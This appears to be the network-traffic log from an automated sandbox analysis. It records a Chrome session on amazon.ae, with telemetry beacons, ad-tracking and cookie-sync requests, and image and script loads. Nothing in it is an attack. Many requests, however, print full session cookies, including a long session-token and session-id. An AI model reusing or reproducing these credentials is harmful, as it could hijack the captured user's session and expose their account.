session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D40564%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26csmtags%3DendVL%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Asi%26si%3D34810%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /match?publisher_dsp_id=416&external_user_id=jvKAuWhPQAOXhozNWu4J2Q&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DimprovedigitalHMT%26id%3D%7BPUB_USER_ID%7D&gdpr_consent= HTTP/1.1Host: match.360yield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3JlZj1uYXZfbG9nbz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK; csm-hit=adb:adblk_no&t:1723469048882&tb:JZJKZTDKNV2CKC82BW2M+s-JZJKZTDKNV2CKC82BW2M|1723469048882
Source: global trafficHTTP traffic detected: GET /setuid/a9?entity=188&code=1vbd3hfWRaKaFNeUMAIWwg&redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DxandrHMT%26id%3D%24UID&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3Daui%3Asw%3Actrl_changed%26bb0%3D1293%26pc0%3D42981%26ld0%3D42981%26t0%3D1723469045979%26csmtags%3Daui%3Asw%3Actrl_changed%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:42980 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /images/I/31ULjw05G7L.js?AUIClients/AmazonLightsaberPageAssets HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81F4LPKOIBL.js?AUIClients/FWCIMAssets HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cross_border_interstitial_sp/render HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK; csm-hit=adb:adblk_no&t:1723469048882&tb:JZJKZTDKNV2CKC82BW2M+s-JZJKZTDKNV2CKC82BW2M|1723469048882
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D34810%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41613 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /e/xsp/imp?b=RFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk&pj=%7B%22measurementMethod%22%3A%22cod_client%22%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /x/px/RFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk/atf/%7B%22atf%22:false%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3DC37SFEY0GDXEZ5HDEVRN%26ue%3D6%26bb%3D1312%26ns%3D1335%26ne%3D1376%26be%3D1599%26cf%3D3071%26af%3D8717%26fn%3D8717%26fp%3D17513%26fcp%3D17513%26pc%3D41598%26tc%3D-1188%26na_%3D-1188%26ul_%3D-1723469002998%26_ul%3D-1723469002998%26rd_%3D-1723469002998%26_rd%3D-1723469002998%26fe_%3D-1184%26lk_%3D-1138%26_lk%3D-1138%26co_%3D-1138%26_co%3D-366%26sc_%3D-1097%26rq_%3D-365%26rs_%3D-36%26_rs%3D505%26dl_%3D-28%26di_%3D1807%26de_%3D1807%26_de%3D1807%26_dc%3D41575%26ld_%3D41575%26_ld%3D-1723469002998%26ntd%3D-1%26ty%3D0%26rc%3D0%26hob%3D4%26hoe%3D6%26ld%3D41599%26t%3D1723469044597%26ctb%3D1%26rt%3Dcf%3A14-1-4-7-2-0-1_af%3A44-1-5-33-5-0-1_ld%3A240-9-7-215-7-0-1%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41625 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /rd/uedata?ld&v=0.294992.0&id=C37SFEY0GDXEZ5HDEVRN&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=C37SFEY0GDXEZ5HDEVRN&ue=6&bb=1312&ns=1335&ne=1376&be=1599&cf=3071&af=8717&fn=8717&fp=17513&fcp=17513&pc=41598&tc=-1188&na_=-1188&ul_=-1723469002998&_ul=-1723469002998&rd_=-1723469002998&_rd=-1723469002998&fe_=-1184&lk_=-1138&_lk=-1138&co_=-1138&_co=-366&sc_=-1097&rq_=-365&rs_=-36&_rs=505&dl_=-28&di_=1807&de_=1807&_de=1807&_dc=41575&ld_=41575&_ld=-1723469002998&ntd=-1&ty=0&rc=0&hob=4&hoe=6&ld=41599&t=1723469044597&ctb=1&rt=cf:14-1-4-7-2-0-1_af:44-1-5-33-5-0-1_ld:240-9-7-215-7-0-1&pty=Gateway&spty=desktop&pti=desktop&tid=C37SFEY0GDXEZ5HDEVRN&aftb=1&lob=1 HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK; csm-hit=adb:adblk_no&t:1723469048882&tb:JZJKZTDKNV2CKC82BW2M+s-JZJKZTDKNV2CKC82BW2M|1723469048882
Source: global trafficHTTP traffic detected: GET /x.png?timestamp=1723469048686 HTTP/1.1Host: redirect.prod.experiment.routing.cloudfront.aws.a2z.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31+4pNVeyCL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41C6hPvag5L._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61Lc5g66DAL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rd?url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dweborama%26id%3D%7BWEBO_ENC_CID%7D HTTP/1.1Host: rd.frontend.weborama.frConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rrum?cm_dsp_id=198&external_user_id=Ug34bixMRdOJE2X5gE7KeQ&cb=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DindexHMT%26id%3D&gdpr_consent= HTTP/1.1Host: dsum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
